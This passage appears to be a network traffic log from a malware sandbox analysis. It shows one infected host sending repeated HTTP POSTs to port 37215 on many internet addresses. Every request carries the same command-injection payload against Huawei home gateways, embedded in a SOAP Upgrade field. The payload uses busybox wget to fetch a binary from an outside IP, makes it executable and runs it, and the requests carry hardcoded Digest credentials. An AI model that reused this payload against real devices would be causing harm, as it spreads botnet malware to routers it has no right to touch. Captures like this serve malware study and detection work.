2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            201192.168.2.1555744197.253.217.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177695990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            202192.168.2.1560234197.16.237.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177705050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            203192.168.2.1559904197.244.241.4637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177738905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            204192.168.2.1541678197.191.47.1137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177758932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            205192.168.2.1546010197.83.168.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177779913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            206192.168.2.1548218197.131.18.16937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177828074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            207192.168.2.1535866197.8.183.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177870035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            208192.168.2.1535336197.42.66.10137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177889109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            209192.168.2.1533880197.17.54.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177916050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            210192.168.2.1550732197.170.228.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177917004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            211192.168.2.1553324197.144.95.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177983046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
